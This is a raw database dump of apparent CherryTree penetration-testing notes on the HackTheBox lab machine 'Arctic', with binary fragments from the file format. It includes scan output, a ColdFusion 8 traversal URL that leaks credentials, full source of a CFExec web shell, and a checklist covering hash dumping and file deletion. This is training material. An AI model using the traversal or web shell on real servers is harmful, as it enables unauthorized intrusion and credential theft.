SQLite format 3@ " -  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node  '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*A?&s.=ui' 10.11.1.custom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?L̊ds'  TCPnmap -sS -A -sV -n -Pn 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-25 14:24 EDT Nmap scan report for 10.10.10.11 Host is up (0.066s latency). Not shown: 997 filtered ports PORT STATE SERVICE VEk#'  Enumerationcustom-colors*A?&s.=u y#Goys'   OtherHTTP found on 8500 Running ColdFusion 8 Multiple Vulns - Authentication Hash leak, Weak hash, Remote file inclusion via Scheduled Taskscustom-colorsA[EϯAןCni '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Adk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2 Vkv)'  Script Resultscustom-colorsXAIZ|xAIq/'  Post Exploitationcustom-colors*AIZnn%w'  ExploitationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability }%#'  ExploitationService Exploited: HTTP vis ColdFusion 8 Vulnerability Type: Credential Leak > Weak Hash > RFI > Exploit POC: Process Listcustom-colors$AIwx-'  Host InformationOperating System Microsoft Windows Server 2008 R2 Standard Architecture x64-based PC Domain Installed Updates C:\ColdFusion8\runtime\bin>systeminfo systeminfo Host Name: ARCTIC OS Name: Microsoft Windows Server 2008 R2 Standard Ov)'  Script Resultscustom-colorsXAIZ|xAI &O G'   NetworkUsers Volume in drive C has no label. Volume Serial Number is F88F-4EA5 Directory of C:\Users 22/03/2017 /]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3Q.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg QQ^Og'  Goodiescustom-colorsVA?& c#+i'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁)c'  Scheduled JobsScheduled Taskscustom-colors$ANl -H//'  Proof\Flags\OtherUSER - tolis - 02650d3a69a70780c302e146a6cb96f3 Root - ce65ceee66b2b5ebaff07e50508ffb90custom-colors$AןI.(#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree Software Versions Potential Exploitscustom-colorsANlH{xi'  Passwordscustom-colors$A?'!f'   Hashescustom-colors$A?&&ich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ., u!5' 10.10.10.11 - Arcticcustom-colorsAמ4v5?h  ' Log Bookcustom-colors(AI^RSION 135/tcp open msrpc Microsoft Windows RPC 8500/tcp open fmtp? 49154/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: specialized|WAP|phone Running: iPXE 1.X, Linux 2.4.X|2.6.X, Sony Ericsson embedded OS CPE: cpe:/o:ipxe:ipxe:1.0.0%2b cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz OS details: iPXE 1.0.0+, Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows TRACEROUTE (using port 135/tcp) HOP RTT ADDRESS 1 ... 30 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 139.92 seconds custom-colors$A?&Aמⱉ7 Zg'  Goodiescustom-colorsVA?& c)+i'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Local.txt FileService Exploited: Tracing Service Vulnerability Type: Kernel Exploit POC: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059 Description: Discovery of Vulnerability Windows-Exploit-Suggester Exploit Code Used https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059 MS10-059.exe Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAןIS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 55041-507-9857321-84451 Original Install Date: 22/3/2017, 11:09:45 �� System Boot Time: 28/3/2020, 3:52:57 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 1.023 MB Available Physical Memory: 175 MB Virtual Memory: Max Size: 2.047 MB Virtual Memory: Available: 1.208 MB Virtual Memory: In Use: 839 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.11 ./windows-exploit-suggester.py --database 2020-03-26-mssb.xls --systeminfo /home/kali/Arctic/sysinfo.txt [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (utf-8) [*] querying database file for potential vulnerabilities [*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits [*] there are now 197 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2008 R2 64-bit' [*] [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical [M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important [E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical [*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC [*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC [*] [E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important [M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important [M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical [E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important <<<<<<<<<<<<<<<<<<<<<<<< [E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important [M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical [M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical [*] done custom-colors$AןH,+ DD9)'   Users & GroupsUsers Volume in drive C has no label. Volume Serial Number is F88F-4EA5 Directory of C:\Users 22/03/2017 09:00 ££ <DIR> . 22/03/2017 09:00 ££ <DIR> .. 22/03/2017 08:10 ££ <DIR> Administrator 14/07/2009 06:57 §£ <DIR> Public 22/03/2017 09:00 ££ <DIR> tolis 0 File(s) 0 bytes 5 Dir(s) 33.184.288.768 bytes free Groupscustom-colors$AןD !>Description: Discovery of Vulnerability Exploit Code Used Credential Leak using http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CColdFusion8%5Clib%5Cpassword.properties%00en RFI using <html> <body> Notes:<br><br> <ul> <li>Prefix DOS commands with "c:\windows\system32\cmd.exe /c <command>" or wherever cmd.exe is<br> <li>Options are, of course, the command line options you want to run <li>CFEXECUTE could be removed by the admin. If you have access to CFIDE/admini"strator you can re-enable it </ul> <p> <cfoutput> <table> <form method="POST" action="cfexec.cfm"> <tr><td>Command:</td><td><input type=text name="cmd" size=50 <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr> <tr><td>Options:</td><td> <input type=text name="opts" size=50 <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr> <tr><td>Timeout:</td><td> <input type=text name="timeout" size=4 <cfif isdefined("form.timeout")>value="#form.timeout#" <cfelse>value="5"</cfif>></td></tr> </table> <input type=submit value="Exec"> </form> <cfif isdefined("form.cmd")> <cfsavecontent variable="myVar"> <cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#"> </cfexecute> </cfsavecontent> <pre> #myVar# </pre> </cfif> </cfoutput> </body> </html> Command - c:\windows\system32\cmd.exe Options - /c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\userlist.txt Navigate to http://10.10.10.11:8500/CFIDE/userlist.txt and we have the user flag. Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,AןD⁙